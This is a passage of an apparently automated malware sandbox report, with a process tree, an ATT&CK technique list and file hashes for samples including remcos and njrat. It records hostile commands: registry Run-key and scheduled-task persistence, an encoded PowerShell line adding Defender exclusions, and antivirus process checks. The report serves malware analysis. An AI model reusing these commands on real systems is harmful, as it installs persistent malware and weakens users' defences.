        Delays execution with timeout.exe
        
        PID:876
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        34⤵
        
        PID:5448
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        34⤵
        
        PID:1772
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        34⤵
        
        PID:5976
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        34⤵
        
        PID:4280
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        34⤵
        
        PID:5008
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        35⤵
        
        PID:5988
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        34⤵
        
        PID:4724
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        34⤵
        
        PID:5400
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6817.tmp\6818.tmp\6819.bat C:\Windows\system32\java.exe"
        35⤵
        
        PID:1596
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        36⤵
        Delays execution with timeout.exe
        
        PID:1160
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        36⤵
        
        PID:2220
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        36⤵
        
        PID:5808
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "HOME" /d "C:\Windows\system32\javaw.exe" /f
        36⤵
        
        PID:5632
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "javaUp" /d "C:\Windows\system32\java.exe" /f
        36⤵
        
        PID:4052
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        36⤵
        
        PID:3660
        
        C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe"
        37⤵
        
        PID:3420
        
        C:\Windows\system32\WinBioData\WindowsDataUpdater.exe
        
        "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe"
        36⤵
        
        PID:5900
        
        C:\Windows\system32\java.exe
        
        "C:\Windows\system32\java.exe"
        36⤵
        
        PID:4128
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\137A.tmp\137B.tmp\137C.bat C:\Windows\system32\java.exe"
        37⤵
        
        PID:4536
        
        C:\Windows\system32\timeout.exe
        
        timeout 1
        38⤵
        Delays execution with timeout.exe
        
        PID:5760
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDataUpdater" /d "C:\Windows\system32\WinBioData\WindowsDataUpdater.exe" /f
        38⤵
        
        PID:5600
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderUpdater" /d "C:\Windows\system32\WinBioData\WindowsDefenderUpdater.exe" /f
        38⤵
        
        PID:5724
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        36⤵
        Delays execution with timeout.exe
        
        PID:2728
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        34⤵
        Delays execution with timeout.exe
        
        PID:2532
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        32⤵
        Delays execution with timeout.exe
        
        PID:4256
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        30⤵
        Delays execution with timeout.exe
        
        PID:3764
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        28⤵
        Delays execution with timeout.exe
        
        PID:5844
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        26⤵
        Delays execution with timeout.exe
        
        PID:3864
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        24⤵
        Delays execution with timeout.exe
        
        PID:5848
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        22⤵
        Delays execution with timeout.exe
        
        PID:4800
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        20⤵
        Delays execution with timeout.exe
        
        PID:4384
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        18⤵
        Delays execution with timeout.exe
        
        PID:2416
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        16⤵
        Delays execution with timeout.exe
        
        PID:5212
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        14⤵
        Delays execution with timeout.exe
        
        PID:2704
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        12⤵
        Delays execution with timeout.exe
        
        PID:852
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        10⤵
        Delays execution with timeout.exe
        
        PID:3780
        
        C:\Windows\system32\timeout.exe
        
        timeout 5
        8⤵
        Delays execution with timeout.exe
        
        PID:1260
      - C:\Windows\system32\timeout.exe
        
        timeout 5
        6⤵
        Delays execution with timeout.exe
        
        PID:5196
  - - C:\Windows\system32\timeout.exe
      timeout 5
      4⤵
      Delays execution with timeout.exe
      PID:5956
- C:\Users\Admin\AppData\Local\Temp\Files\o.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\o.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  PID:5840
- - C:\Windows\sysnldcvmr.exe
    C:\Windows\sysnldcvmr.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:1736
  - - C:\Users\Admin\AppData\Local\Temp\86635797.exe
      C:\Users\Admin\AppData\Local\Temp\86635797.exe
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:648
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        5⤵
        
        PID:5596
      - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
        6⤵
        
        PID:5724
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
        5⤵
        
        PID:5720
      - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "Windows Upgrade Manager"
        6⤵
        
        PID:5732
  - - C:\Users\Admin\AppData\Local\Temp\1757527941.exe
      C:\Users\Admin\AppData\Local\Temp\1757527941.exe
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3364
    - - C:\Users\Admin\AppData\Local\Temp\2063818407.exe
        
        C:\Users\Admin\AppData\Local\Temp\2063818407.exe
        5⤵
        
        PID:2560
  - - C:\Users\Admin\AppData\Local\Temp\825323185.exe
      C:\Users\Admin\AppData\Local\Temp\825323185.exe
      4⤵
      PID:6048
  - - C:\Users\Admin\AppData\Local\Temp\1710112153.exe
      C:\Users\Admin\AppData\Local\Temp\1710112153.exe
      4⤵
      PID:4496
    - - C:\Users\Admin\AppData\Local\Temp\1788639319.exe
        
        C:\Users\Admin\AppData\Local\Temp\1788639319.exe
        5⤵
        
        PID:4744
- C:\Users\Admin\AppData\Local\Temp\Files\file.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\file.exe"
  2⤵
  - Adds policy Run key to start application
  - Checks computer location settings
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  PID:1220
- - C:\ProgramData\tst\remcos.exe
    "C:\ProgramData\tst\remcos.exe"
    3⤵
    - Adds policy Run key to start application
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: MapViewOfSection
    PID:3392
  - - \??\c:\program files (x86)\internet explorer\iexplore.exe
      "c:\program files (x86)\internet explorer\iexplore.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:5248
- C:\Users\Admin\AppData\Local\Temp\Files\hhnjqu9y.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\hhnjqu9y.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:1724
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5208
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 620
      4⤵
      Program crash
      PID:1448
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
    "Powershell" Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Files\hhnjqu9y.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ucloud.exe'
    3⤵
    PID:2496
- C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5860
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy Impacts Impacts.bat & Impacts.bat
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5820
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:6088
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa opssvc"
      4⤵
      PID:3944
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:2028
  - - C:\Windows\SysWOW64\findstr.exe
      findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
      4⤵
      PID:4812
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 578678
      4⤵
      PID:4352
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "PEACEFOLKSEXUALISLANDS" Hill
      4⤵
      PID:5524
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b ..\Webpage + ..\Von + ..\Exotic + ..\Relief + ..\Seo + ..\Serious + ..\Myth y
      4⤵
      PID:5688
  - - C:\Users\Admin\AppData\Local\Temp\578678\Cooper.pif
      Cooper.pif y
      4⤵
      PID:5516
  - - C:\Windows\SysWOW64\choice.exe
      choice /d y /t 5
      4⤵
      PID:2680
- C:\Users\Admin\AppData\Local\Temp\Files\Identifications.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Identifications.exe"
  2⤵
  - Executes dropped EXE
  PID:1280
- C:\Users\Admin\AppData\Local\Temp\Files\contorax.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\contorax.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:3168
- - C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe
    "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:3324
- C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\OneDrive.exe"
  2⤵
  PID:5644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwARgBpAGwAZQBzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAEYAaQBsAGUAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA==
    3⤵
    PID:1940
- C:\Users\Admin\AppData\Local\Temp\Files\crypted25.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypted25.exe"
  2⤵
  PID:4940
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:2276
- C:\Users\Admin\AppData\Local\Temp\Files\njrat.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\njrat.exe"
  2⤵
  PID:5220
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 224
    3⤵
    - Program crash
    PID:4200
- C:\Users\Admin\AppData\Local\Temp\Files\si.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\si.exe"
  2⤵
  PID:1740
- C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe"
  2⤵
  PID:1472

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:3480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
1⤵
- Command and Scripting Interpreter: PowerShell
PID:1948

C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
1⤵
PID:4812

C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
1⤵
PID:3188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5208 -ip 5208
1⤵
PID:6096

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
1⤵
- Command and Scripting Interpreter: PowerShell
PID:5864
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4420

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
1⤵
PID:5804

C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
1⤵
PID:2092

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:1900

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 540 -p 1900 -ip 1900
1⤵
PID:1964

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:4316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2496 -ip 2496
1⤵
PID:4996

C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe
"C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe" -service -lunch
1⤵
PID:4416
- C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe"
  2⤵
  PID:1032

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Modify Authentication Process

T1556

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Authentication Process

T1556

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Modify Authentication Process

T1556

Steal Web Session Cookie

T1539

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\EBGIEGCFHCFH\KKJKFB

Filesize
96KB

MD5
40f3eb83cc9d4cdb0ad82bd5ff2fb824

SHA1
d6582ba879235049134fa9a351ca8f0f785d8835

SHA256
cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0

SHA512
cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
f2299d216071ea326c2a585d81c25f3a

SHA1
fa0abb2559966b75265150c24c7843b7182d2493

SHA256
7c199ea7964f0b222dac48e0746058dd5d5b86afbd9f225b65eda0eb27588c71

SHA512
0e0d65bcb26257551c7c3f3cf74fb2747926a03c2416e99bdb6f53025e1aa6e4d96fa48d8ecfeb45a4a27628b9e1db50b92a6ed4060e6d34621e1250c7c3368d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\_locales\en_CA\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.84.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ba6ef346187b40694d493da98d5da979

SHA1
643c15bec043f8673943885199bb06cd1652ee37

SHA256
d86eec91f295dfda8ed1c5fa99de426f2fe359282c7ebf67e3a40be739475d73

SHA512
2e6cc97330be8868d4b9c53be7e12c558f6eb1ac2c4080a611ba6c43561d0c5bb4791b8a11a8c2371599f0ba73ed1d9a7a2ea6dee2ae6a080f1912e0cb1f656c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
b8880802fc2bb880a7a869faa01315b0

SHA1
51d1a3fa2c272f094515675d82150bfce08ee8d3

SHA256
467b8cd4aacac66557712f9843023dcedefcc26efc746f3e44157bc8dac73812

SHA512
e1c6dba2579357ba70de58968b167d2c529534d24bff70568144270c48ac18a48ee2af2d58d78ae741e5a36958fa78a57955bd2456f1df00b781fc1002e123d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\3057964c-734a-4a4d-88f9-0142b80ee116.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\45bfc249-5313-4c10-aaeb-81031ebebef7.tmp

Filesize
5KB

MD5
10de4f9a32f6cdcb8a744a7c80106edd

SHA1
f2d7beb136577d0e7011a654379846d0aa69b24f

SHA256
0de303ea2b88738b52785b5781f2568a32c536d77c91523d86d9c0ca9b7fe646

SHA512
99ae8183cf978afba1193ef1014fcf2630c3ddba621d2e99d4b7f7d4cd8a12e9f03491843aef1af258408d6e41608e7689d974dc8841de3820c8fd0a1446bfe4

Download Submit
C:\Users\Admin\AppData\Local\Temp\B503.tmp\B504.tmp\B505.bat

Filesize
1KB

MD5
b7ad290c8ed22e19d61aaeb8fd0c7bf2

SHA1
cec47e2b90320f87bb7f475f54b7d1e69ab1ad53

SHA256
78b4a6676810bf76f1111284ca945a14bb884267fb536c5865e0d62b27f32612

SHA512
4fdf72b4566372d86abce8cdbcf0048acd09edd825fa5b8ffe9688f7983f7115798424f8e25b425381593f2f08739470956fd5bcc9ef6ce3bf1765b33ef6e0fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\CxpxIfdk6M.tmp

Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\0b44ippu.exe

Filesize
1.6MB

MD5
0f4af03d2ba59b5c68066c95b41bfad8

SHA1
ecbb98b5bde92b2679696715e49b2e35793f8f9f

SHA256
c263ebdc90fdb0a75d6570f178156c0ba665ac9f846b8172d7835733e5c3de59

SHA512
ea4de68e9eb4a9b69527a3924783b03b4b78bffc547c53a0ecd74d0bd0b315d312ae2f17313085acd317be1e0d6f9a63e0089a8a20bf9facc5157a9b8bea95a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\5447jsX.exe

Filesize
392KB

MD5
5dd9c1ffc4a95d8f1636ce53a5d99997

SHA1
38ae8bf6a0891b56ef5ff0c1476d92cecae34b83

SHA256
d695267de534c2c99ec2823acc193fdbec9f398b0f78155ae2b982457ff631aa

SHA512
148d1b324391c4bb63b152a3c91a586b6821c4f5cde2a3f7afa56ad92074672619554fba3b2baca9802ff1ed9b42081574163304d450f7ccf664638599b23c2a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\7cl16anh.exe

Filesize
986KB

MD5
4f2e93559f3ea52ac93ac22ac609fc7f

SHA1
17b3069bd25aee930018253b0704d3cca64ab64c

SHA256
6d50bd480bb0c65931eb297b28c4af74b966504241fca8cd03de7058a824274d

SHA512
20c95b9ee479bf6c0bc9c83116c46e7cc2a11597b760fd8dcd45cd6f6b0e48c78713564f6d54aa861498c24142fde7d3eb9bd1307f4f227604dd2ee2a0142dbe

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Ammyy.exe

Filesize
748KB

MD5
3b4ed97de29af222837095a7c411b8a1

SHA1
ea003f86db4cf74e4348e7e43e4732597e04db96

SHA256
74656a65e96590a2734384bf89cb9ff677dcedff5f6e937d350b9f46ec52cd0a

SHA512
2e1d1365163b08310e5112063be8ebd0ec1aa8c20a0872eef021978d6eb04a7b3d50af0a6472c246443585e665df2daa1e1a44a166780a8bf01de098a016e572

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Aquarius.exe

Filesize
7.8MB

MD5
a18fe6fa6a9296ba8faf7e7dcfd5d0f8

SHA1
f517bda6950bc5698283c8d53f097aa3144ca8a6

SHA256
5b88c90d6befe358e25846b35b945616ae04902576dfbe2905aecaf73126fbb2

SHA512
35e04f40ad113b0fc95ffca288836db0c9f0ecec5bbe4c683ef6eed88eec4ea5aab075dfb23bb433cfd8ac7197e7f220fae90a42e849497f36b6dba1adf1bc42

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\BeamNG.UI.exe

Filesize
47KB

MD5
583b2abf1d9d7ee5e3b21d671074f691

SHA1
d6557131cd6266d9a7fa3a301a852809dab5e481

SHA256
fc1443222c765d941e38f6e796f9fd82538ac31ba06322e7534eeccf08f0e2c4

SHA512
50e67acd3c0acb719986a005fa3a63ce28a4f5a454f2ff3ec2b37457a73161b4140518eb978d2dfa09ed28113ab36429006bf1a25a3a06e9dcde632b2c480072

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files\Identifications.exe

Filesize
9.2MB

MD5
5f283d0e9d35b9c56fb2b3514a5c4f86

SHA1
5869ef600ba564ae7bc7db52b9c70375607d51aa

SHA256
41657910cd010c7e5ebbbfc11a2636fa1868a9bffe78d98b8faa7bd0e9c5c3b8

SHA512
b5b78975c6328feb5e1986698174a85ddf722a639234eb6fe80cfccabaa7d0c09678c9465fd6a9586a0a412f2586d9e9d38eb5243626a2b44a8c8512322415b3

Download Submit
